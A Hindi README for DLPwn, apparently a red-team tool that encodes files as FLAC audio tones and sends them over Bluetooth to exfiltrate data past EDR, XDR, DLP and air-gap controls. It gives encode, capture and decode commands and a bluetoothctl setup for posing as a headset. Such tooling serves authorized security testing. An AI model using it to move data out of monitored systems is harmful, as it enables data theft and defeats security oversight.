
रेड टीम उपकरण, ब्लूटूथ ऑडियो ट्रांसमिशन के माध्यम से गुप्त फ़ाइल निष्कासन के लिए, बाइनरी डेटा को FLAC सिग्नल में एन्कोड करके EDR, XDR और DLP सुरक्षा प्रणालियों को बायपास करने के लिए।
ब्लूटूथ स्पीकर के माध्यम से डेटा लीक रोकथाम
DLPwn एक रेड टीम उपकरण है जो EDR (एंडपॉइंट डिटेक्शन एंड रिस्पॉन्स), XDR (एक्सटेंडेड डिटेक्शन एंड रिस्पॉन्स), DLP (डेटा लॉस प्रिवेंशन), और अधिक व्यापक रूप से किसी भी एयर-गैप्ड सूचना प्रणाली जैसी सुरक्षा प्रणालियों को दरकिनार करने के लिए फ़ाइल निष्कासन (exfiltration) के लिए डिज़ाइन किया गया है। यह मनमानी फ़ाइलों को FLAC ऑडियो सिग्नल में एनकोड करने, उन्हें प्रसारित करने और दूसरे छोर पर डीकोड करने के लिए ब्लूटूथ ऑडियो ट्रांसमिशन का उपयोग करता है, इस तथ्य का लाभ उठाते हुए कि ऑडियो सुरक्षा नियंत्रण अक्सर नेटवर्क या फ़ाइलों की तुलना में कम सख्त होते हैं।
DLPwn तीन मुख्य चरणों में काम करता है:
यह दृष्टिकोण नेटवर्क कनेक्शन, डिस्क राइट्स या संदिग्ध प्रक्रियाओं की निगरानी करने वाली सुरक्षा प्रणालियों से अलर्ट ट्रिगर किए बिना संवेदनशील डेटा के निष्कासन की अनुमति देता है।
DLPwn निम्न पर आधारित एक ऑडियो ट्रांसमिशन प्रोटोकॉल का उपयोग करता है:
प्रत्येक फ़ाइल 212 बाइट्स तक के फ़्रेमों में खंडित की जाती है, जिसमें फ़ाइलनाम वाला एक मेटाडेटा फ्रेम होता है।
DLPwn में ट्रांसमिशन गुणवत्ता का मूल्यांकन करने के लिए एक QoS मीट्रिक सिस्टम शामिल है:
यह ऑडियो स्थितियों के आधार पर ट्रांसमिशन पैरामीटर (बॉड दर, टोन की संख्या) को अनुकूलित करने की अनुमति देता है।
pip install -r requirements.txt
python main.py encode myfile.bin --output transmission.flac
FLAC को ब्लूटूथ स्पीकर पर चलाएं, फिर दूसरी मशीन पर कैप्चर करें:
python main.py bluetooth --filename capture.flac
नोट: ब्लूटूथ कॉन्फ़िगरेशन (केवल Linux)
bluetooth कमांड केवल Linux सिस्टम पर काम करता है जो ब्लूटूथ ऑडियो कैप्चर के लिए PulseAudio या PipeWire का उपयोग करते हैं। PC को स्रोत डिवाइस द्वारा ब्लूटूथ हेडसेट के रूप में पहचाना जाने के लिए:
यदि आवश्यक हो तो bluetoothctl इंस्टॉल करें:
sudo apt install bluez-tools
bluetoothctl लॉन्च करें और ऑडियो हेडसेट का अनुकरण करने के लिए ClassID कॉन्फ़िगर करें:
bluetoothctl
> power on
> discoverable on
> pairable on
> class 0x240404 # स्टीरियो ऑडियो हेडसेट के लिए क्लास
> quit
यह स्रोत डिवाइस (फ़ोन, PC) को PC से ब्लूटूथ हेडसेट के रूप में कनेक्ट करने की अनुमति देता है, जिससे PulseAudio के माध्यम से ऑडियो कैप्चर सक्षम होता है।
या लाइव कैप्चर के लिए:
python main.py decode --loopback --duration 35 --output recovered.bin
python main.py decode --input capture.flac --output recovered.bin
एक कमांड में चलाने, कैप्चर करने और डीकोड करने के लिए:
python main.py stream transmission.flac --output recovered.bin
--baud: प्रतीक दर (डिफ़ॉल्ट 1500)।--m: FSK टोन की संख्या (2, 4, या 8)।--rs-nsym: RS पैरिटी बाइट्स (डिफ़ॉल्ट 32)।--f0, --f1: आधार आवृत्तियाँ।ट्रांसमिशन फ़ाइल का विश्लेषण करने के लिए:
python diagnose.py transmission.flac
रेड टीम परिदृश्य में, DLPwn अनुमति देता है:
चेतावनी: केवल अधिकृत वातावरण में उपयोग करें। ऑडियो ट्रांसमिशन आस-पास के कैमरों या माइक्रोफ़ोन द्वारा पता लगाया जा सकता है।